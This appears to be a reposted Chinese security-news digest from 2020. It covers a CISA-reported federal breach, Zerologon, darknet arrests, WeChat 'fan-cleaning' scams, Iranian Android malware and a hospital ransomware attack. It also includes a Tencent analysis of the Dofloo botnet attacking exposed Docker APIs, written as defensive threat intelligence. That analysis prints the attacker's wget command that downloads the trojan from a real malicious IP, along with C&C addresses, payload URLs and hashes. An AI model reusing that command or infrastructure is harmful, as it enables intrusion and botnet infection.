内容转载

= ̄ω ̄= 内容转载

美国网络安全与基础设施安全局网站遭黑客入侵

据彭博社报道,美国当局周四表示,在黑客使用有效的访问凭据后,一家未具名的美国联邦机构遭到了网络攻击。据美国网络安全与基础设施安全局(CISA)称,虽然没有透露有关黑客的许多细节,但联邦当局确实泄露了黑客能够浏览目录,复制至少一个文件并泄露数据的信息。 当局称,黑客植入了恶意软件,该恶意软件逃避了该机构的保护系统,并通过对多个用户的Microsoft 365帐户和域管理员帐户使用有效的访问凭据来获得对网络的访问权限。 调查人员无法确定黑客最初是如何获得证书的。但是该机构表示,黑客有可能通过利用Pulse Secure虚拟专用网络服务器中的一个已知漏洞来获取它们。 据美国国土安全部官员称,网络攻击事件与即将举行的美国大选无关。CISA是该部门的一部分。 CISA发布了有关该漏洞的技术细节,但未提供有关窃取了哪些数据或该黑客是否由一个另一个国家实施的信息。美国政府有时会公开此类“技术指标”,以便公司或其他政府可以检查自己的系统是否受到攻击。 CISA通过监视联邦民用机构的入侵检测系统意识到了这一漏洞。     (稿源:cnBeta,封面源自网络。)

Facebook 移除多个虚假账户 担忧大选期间黑客攻击

据报道,Facebook公司周四向外界表示,它已经移除了三个虚假账户网络,因为俄罗斯情报部门可能利用这些账户来泄露遭黑客入侵的文件,扰乱即将到来的美国大选。该公司表示,这些账户因使用假身份和其他类型的“协同不真实行为”而被暂停使用。这些账户与俄罗斯情报部门和位于圣彼得堡的一个组织有关。美国官员曾指责该组织试图影响2016年的总统选举。 俄罗斯外交部目前尚未回应置评请求。此前,俄罗斯已一再否认试图干预美国大选,并表示不会干涉其他国家的内政。 Facebook网络安全政策负责人纳撒尼尔·格雷切(Nathaniel Gleicher)说,目前还没有证据表明被黑客攻击的文件会被泄露,但Facebook希望通过暂停这些账户来进行预防。 Facebook表示,这些网络规模很小,在Facebook和Instagram上只有少数几个账户,其中一些还冒充独立媒体和智库。这些账户总共只有97000个粉丝。 Facebook说,这些账户的目标受众是英国和美国的用户,但这些账户的地址主要位于中东和与俄罗斯接壤的国家,如叙利亚、土耳其、乌克兰和白俄罗斯等。 Twitter也表示,已与Facebook合作,确认并删除了350个由俄罗斯国有机构运营的账户。 两家公司都表示,其中一个账户网络是在联邦调查局(FBI)的举报后发现的。FBI周二警告说,外国网络犯罪分子很可能散布有关11月3日总统大选结果的假消息。 大西洋理事会(Atlantic Council)数字取证研究实验室主任格雷厄姆·布鲁克(Graham Brookie)认为,这些账户进行的一些活动表明,俄罗斯正在持续努力加剧美国和其他地区的政治紧张局势。 他说:“虽然国内虚假信息的规模和范围远远大于任何外国对手所能做到的,但来自俄罗斯的影响仍然是我们面临的一个极其严重的国家安全威胁。”     (稿源:新浪科技,封面源自网络。)

可 3 秒入侵 Windows 服务器:微软敦促客户尽快修复 Zerologon 漏洞

在 Zerologon 漏洞开始疯狂传播之后,美国国土安全局责令政府网络管理员责令政府网络管理员立即给 Windows Server 2008 及以上版本(包括 Windows 10 Server)打补丁。现在,微软也加入这一呼吁,表示:“微软正在积极跟踪 CVE-2020-1472 Netlogon EoP 漏洞(也被称之为 Zerologon)的活动情况,我们已经观测到有黑客利用该漏洞发起了攻击”。 该漏洞编号为 CVE-2020-1472,存在于 Windows Server 中 Active Directory 核心验证元件 Netlogon 远程协议(MS-NRPC)中,可让未经授权的攻击者借由和网域控制器建立 TCP 连线时,送入假造的 Netlogon 验证令符而登入网域控制器,进而完全掌控所有 AD 网域内的身份服务。 在 8 月的补丁星期二活动日中,微软修复了这个漏洞。虽然该漏洞的CVSS 评分为满分10分,但细节从未公开过,也就是说用户和IT 管理员从未意识到该漏洞的严重程度有多高。 CISA已发布紧急指令20-04,指示联邦文职行政部门机构对所有域控制器应用微软Windows服务器2020年8月安全更新(CVE-2020-1472)。CISA 已经指示政府服务器在9月21日(本周一)之前打好补丁,同时也强烈敦促他们在州和地方政府、私营部门以及美国公众中的合作伙伴尽快应用这一安全更新。     (稿源:cnBeta,封面源自网络。)

179 名网络犯罪分子被捕 国际警察警告暗网黄金时代已结束

据外媒报道,作为一项协调国际行动的一部分,来自世界各地的执法机构已经逮捕了179名涉嫌在暗网非法买卖商品和服务的网络罪犯分子。另外,警方还发出警告称–“暗网黄金时代已经结束”。这次协调行动由德国联邦刑事警察牵头,并得到了荷兰国家警察、英国国家犯罪署、美国司法部和FBI、欧洲刑警组织等政府机构的支持。 据悉,这场被称为Operation Disruptor的行动是继去年Wall Street Market后的又一个针对非法网络交易行动而展开的执法行动。据了解,被捕人数最多的是美国,有121人,其次是德国,42人,8人在荷兰、4人在英国、3人在奥地利、1人在瑞典被逮捕。 被逮捕的人涉嫌出售非法物品和服务,包括毒品和枪支。执法部门在逮捕行动之后缴获了超650万美元的现金和加密货币。 欧洲执法机构欧洲刑警组织在一份声明中表示:“暗网市场的黄金时代已经结束。此类行动凸显了执法部门对抗暗网市场加密和匿名的能力。警方不再只是拿下这些非法市场,他们还会追捕通过这些网站买卖非法商品的犯罪分子。暗网不再是童话–卖家和买家不再隐藏在阴影之下。” 奥地利、塞浦路斯、德国、荷兰、瑞典、澳大利亚、加拿大、英国和美国都参与了逮捕行动。目前调查仍在进行中,执法部门希望往后能逮捕到更多的人。     (稿源:cnBeta,封面源自网络。)

美众议员罗弗格伦:参议院的加密后门法案“对美国人来说非常危险”

据外媒TechCrunch报道,众议院一位主要民主党人表示,参议院法案将强制科技公司建立后门,允许执法部门访问加密设备和数据,这对美国人来说是“非常危险的”。执法部门经常因为科技公司使用强加密技术而与科技公司发生争执,强加密技术可以保护用户数据不被黑客和窃取,但美国政府官员表示,这使其更难抓住被指控犯有严重罪行的罪犯。 苹果和谷歌等科技公司近年来加倍加强了安全工作,用连他们自己都无法解锁的加密技术保护数据安全。 参议院共和党人在6月提出了最新的 “合法访问 “法案,延续了之前的努力,迫使科技公司在出示法院命令时允许执法部门访问用户的数据。 “这对美国人来说非常危险,因为它会被黑客攻击,它会被利用,而且没有办法让它变得安全,”来自民主党的众议院议员佐伊·罗弗格伦(Zoe Lofgren)在Disrupt 2020上告诉TechCrunch。“如果我们消除加密,我们只是在向大规模的黑客和破坏开放,”她说。 罗弗格伦的评论与批评者和安全专家的评论相呼应,他们长期以来一直批评破坏加密的努力,认为没有办法为执法部门建立一个后门,而这个后门也不能被黑客利用。 立法者之前几次削弱和破坏加密的努力都失败了。目前,执法部门只能利用现有的工具和技术来寻找手机和电脑的弱点。美国联邦调查局多年来声称它有数千台设备无法进入,但在2018年承认,它一再夸大其拥有的加密设备数量,以及因此而受到负面影响的调查数量。 罗弗格伦自1995年以来一直在国会任职,在第一次所谓的“加密战争”期间,安全社区与联邦政府对抗,以限制对强加密的访问。2016年,罗弗格伦是众议院司法委员会加密工作小组的成员。该小组的最终报告是两党的,发现任何破坏加密的措施都 “有损国家利益”,但不具有约束力。 不过,这是美国政府继续推动的一个话题,甚至在今年,美国司法部长威廉·巴尔表示,美国人应该接受加密后门带来的安全风险。 “你无法安全地消除加密,”罗弗格伦告诉TechCrunch。“如果你这样做,你会给国家和美国人带来混乱,更不用说世界各地的其他人了,”她说。“这只是一件不安全的事情,我们不能允许它。”     (稿源:cnBeta,封面源自网络。)

动视发生严重个人资料泄漏事件:超 50 万账号被曝光

援引外媒 Dexerto 报道,可能有超过 50 万个动视账号被入侵,包括密码在内的登录凭证信息被泄漏。动视账户主要用于追踪《使命召唤》游戏的进度,以及包括《只狼:影逝二度》等其他动视游戏,并邀请更多玩家加入。 上周日晚上,Okami 和 TheGamingRevolution 等《使命召唤》的 Insider 率先报告了动视的本次安全事件,他们称黑客攻击是持续的。TheGamingRevolution 在推文中写道:“动视的账号显然正在泄漏,所以请尽快改变你的密码,尽管这可能甚至没有帮助,因为他们每 10 分钟就会窃取 1000 个账户”。 虽然我们不知道黑客究竟是如何获得账户的访问权限,但很可能他们只是使用了蛮力的方法,因为动视账户不提供双因素认证。众多《使命召唤》玩家表示,由于黑客进入他们的动视账户并更改密码,导致无法进入他们的账户。 截至目前,还不知道黑客攻击是否还在进行中,也不知道受影响的账号情况如何,因为动视还没有就此事发表任何形式的声明,而最初透露事情经过的人也没有透露任何新的信息。 更新:在 1 个小时之前,动视发布公告,并提供了确认用户账号是否安全的指南。     (稿源:cnBeta,封面源自网络。)

“微信清粉”软件存风险 有用户中毒或被盗取个人信息

微信已经成了很多人的主要联系方式,很多场合下人们已经从留电话变为加好友。微信通讯录越来越长,但里面一些人却很少联系,于是,一种所谓“微信清粉”的服务应运而生,相信很多人都收到、看到过这样的信息,甚至是使用过这样的服务。然而您不知道的是,这种方式可能威胁到您的信息安全。 年恒是一位医务工作者,今年9月的一天,他突然收到一条令他意外的微信信息。 年恒:“我点开看了之后发现,是有一段时间没联系的一个老师,她发了一条微信朋友圈,说她最近使用了一个微信清粉的服务,非常好用,底下有一条链接。当时我看到这个消息的时候我也是非常奇怪,因为我印象中老师一般不会发这种消息。” 年恒向老师发微信询问事情的原委,对方回复说她是在一个微信群中看到了一个清粉二维码,考虑到自己微信中的好友人数非常多,确实想清理好友,于是进行了尝试。 年恒:“当时(老师)摁了一下二维码识别了之后,在她自己都不知道的情况下,就往朋友圈里面发了一些消息,同时还往群里面散布了这些消息,给她自己带来非常多的麻烦。那一天下午没有做别的,就一直在解释,说自己受骗了,是扫描二维码后自动发出的。” 采访中,不少微信用户都反映他们收到过好友发送的微信清粉链接或二维码。这些微信“清粉”链接,不仅会自动在朋友圈发送广告,还可能盗取用户的个人账号信息来售卖牟利。网友黄女士在消费投诉平台“聚投诉”上反映,今年5月她在使用“清粉”服务后,很快发现微信中有一笔自己并不知情的交易,对方是某网络游戏。继而她发现,在这款从未接触过的网游中,竟有自己的实名注册账号。 微信“清粉”实为控制账号 安全风险大 那么这种所谓的“清粉”服务究竟是如何进行操作的,又会给用户带来哪些信息安全隐患? 专家表示,“清粉”的原理是通过应用集群控制软件来控制待清理的微信账户,让该账户自动向其所有好友群发消息,再由群控软件根据“信息是否能够成功发送接收”来识别其中哪些是“僵尸粉”并删除。而无论是群发消息还是拉群,都需要用户通过扫描二维码来授权清粉服务的提供者登录网页版微信。而在这背后,潜藏着巨大的风险。 数字经济智库高级研究员胡麒牧:“第一个因为你授权给他,相当于他接管了你的账户,这样他就可以调取你的个人资料,包括微信的通讯录、聊天记录,还有你手机的通讯录、聊天资料、通讯录和你的一些资料,都有可能会泄露出去;第二个他通过占有你的一个账户,他去注册一些其他的账户去做一些事情,如果这些事情是违法的,就会对你个人的一个征信带来影响;第三个他可能会通过你的账户发一些比如诈骗之类的一些信息。” 全国首例“清粉”案告破 专家提醒扫码务必谨慎 近日,江苏南通市公安局对外披露,他们在“净网2020”专项行动中成功侦破一起利用微信“清粉”软件非法获取计算机信息系统数据的案件,5名涉案犯罪嫌疑人全部落网,这也是全国破获的首例利用“清粉”软件非法获取信息的案件。 在案件侦破中,江苏南通市公安局网安支队的民警发现,围绕“清粉”软件非法获取的用户信息已经形成了一个非法倒卖的黑色产业链。 江苏省南通市通州区公安局民警曹灿华:“犯罪嫌疑人在取得微信账号的控制权限后,借机非法获取用户微信群聊二维码信息,并将这些群聊二维码以图片形式保存在服务器上。” 随后,犯罪嫌疑人再将用户微信群聊二维码等信息倒卖给下游的诈骗、赌博等犯罪团伙。短短3个月时间,该犯罪团伙共非法获取用户微信群聊二维码2000余万个,均出售给了福建龙岩等地的诈骗赌博犯罪团伙,同时还为他人批量关注微信公众号和刷阅读量、刷赞,先后获利200余万元。 江苏省南通市通州区公安局网安大队副大队长徐辉:“从非法获取微信用户的相关个人信息到下游的广告、营销和其他网络犯罪,相关的网络黑灰产已经形成一个各环节相互独立又紧密协作的产业链。” 目前,5名涉案犯罪嫌疑人因涉嫌非法获取计算机信息系统数据罪均已被执行逮捕,案件在进一步办理中。律师表示,“隐蔽性、跨地域性、证据材料不易固定等”是整治此类乱象的难点,而这些特征也增加了用户维权的难度。 北京市京师律师事务所律师孟博表示,基于“清粉”软件所潜在的巨大风险,不建议使用此类“服务”,提升防范意识,保护好个人信息;不要轻易点击不明来源的链接、二维码;在对外转账时,提前多方核实。 我们也呼吁软件开发商应该更积极地承担起监管责任,想办法从源头堵住这类行为,避免用户遭受损失。     (稿源:央视,封面源自网络。)

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击 Docker 容器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。 具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Dofloo僵尸网络关联的IOCs已支持识别检测; 2)检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Dofloo僵尸网络相关木马程序; 2)已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2)检测Docker未授权访问漏洞利用攻击; 3)检测DDoS攻击流量;   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表: 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接: https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

伊朗黑客组织开发 Android 恶意软件用于窃取双因素验证短信

安全公司Check Point表示,它发现了一个伊朗黑客组织开发的特殊Android恶意软件,能够拦截和窃取通过短信发送的双因素验证(2FA)代码。该恶意软件是该公司昵称为Rampant Kitten的黑客组织开发的黑客工具库的一部分。 伪装成欧盟驾照培训辅助应用的App Check Point表示,该组织至少活跃了6年,一直在从事针对伊朗少数族裔、反对组织和抵抗运动的持续监视行动。 这些活动涉及使用广泛的恶意软件系列,包括四种Windows信息窃取工具的变种和伪装在恶意应用程序中的Android后门。 其开发的Windows恶意软件主要用于窃取受害者的个人文件,但也窃取Telegram的Windows桌面客户端的文件,这些文件允许黑客访问受害者的Telegram账户。 此外,面向Windows分支的恶意软件还窃取KeePass密码管理器中的文件,与本周早些时候发布的CISA和FBI关于伊朗黑客及其恶意软件的联合警报中的功能描述一致。 但虽然Rampant Kitten黑客偏爱开发Windows木马,但他们也为Android开发了类似的工具。 在今天发布的一份报告中,Check Point研究人员表示,他们还发现了该组织开发的一个强大的Android后门。该后门可以窃取受害者的通讯录列表和短信,通过麦克风悄悄记录受害者,并显示钓鱼页面。但更值得关注的是,该后门还包含专门针对窃取2FA(双因素认证)的代码。 Check Point表示,该恶意软件会拦截并转发给攻击者任何包含 “G-“字符串的短信,该字符串通常被用于通过短信向用户发送谷歌账户的2FA代码前缀。 其思路是,Rampant Kitten运营商会利用Android木马显示谷歌钓鱼页面,获取用户的账户凭证,然后访问受害者的账户。 如果受害者启用了2FA,恶意软件的2FA短信拦截功能就会悄悄地将2FA短信代码的副本发送给攻击者,让他们绕过2FA。 但事实并非如此。Check Point还发现有证据表明,该恶意软件还会自动转发所有来自Telegram和其他社交网络应用的接收短信。这些类型的消息也包含2FA代码,该团伙很有可能利用这一功能绕过2FA,而不是谷歌账户。 目前,Check Point表示,它发现这个恶意软件隐藏在一个Android应用内,伪装成帮助瑞典讲波斯语的人获得驾照的服务。然而,该恶意软件可能潜伏在其他针对反对德黑兰、生活在伊朗境内外的伊朗人的应用内。 虽然人们普遍认为国家支持的黑客组织通常能够绕过2FA,但我们很少能深入了解他们的工具和他们如何做到这一点。      (稿源:cnBeta,封面源自网络。)

德医院遭遇勒索软件攻击:一名患者或因此死亡

据外媒报道,一名生命垂危的患者因勒索软件攻击被迫去了更远的医院,不幸的是,这位患者最终没能被救回来。当地时间9月10日,德国杜塞尔多夫大学医院遭遇勒索软件攻击,而正是因为这个攻击他们的IT系统中断进而导致门诊治疗和紧急护理无法正常进行。 于是,那些寻求紧急护理的人只能被转移到更远的医院接受治疗。 德国媒体报道称,警方通过赎金说明联系了勒索软件运营商并解释说他们的目标是一家医院。 据悉,留在医院加密服务器上的勒索信息显示,其原本的攻击对象是杜塞尔多夫大学而非杜塞尔多夫大学医院。 在警方联系了勒索软件攻击者并解释说他们加密了一家医院之后,攻击者撤回了赎金要求并提供了解密密钥。 医院在收到钥匙后开始在缓慢地恢复系统,而调查得出的结论显示,数据应该没有被盗。 据NTV报道,杜塞尔多夫大学医院取消了紧急服务登记后,一名生命受到威胁的病人被转到了更远的医院。这种干扰导致病人在一小时后接受治疗很有可能导致了其最后的死亡。对此,德国检察官正在调查此次网络攻击是否犯下过失杀人罪。检方以涉嫌过失杀人罪对这两名身份不明的肇事者展开调查,原因是一名生命危险的病人被送到了伍珀塔尔的一家医院,而这家医院距离事发地约有32公里。 外媒BleepingComputer在新冠病毒大流行初期接触了不同的勒索软件公司看看他们是否会继续攻击医疗保健和医疗机构。对此,CLOP、DoppelPaymer、Maze和Nefilim勒索软件的运营者表示,他们不会以医院为目标,如果有医院被错误加密他们会提供免费的解密密钥。不过Netwalker表示,他们虽然不是以医院为目标,但如果他们不小心加密了一家医院,后者仍需要支付赎金。     (稿源:cnBeta,封面源自网络。)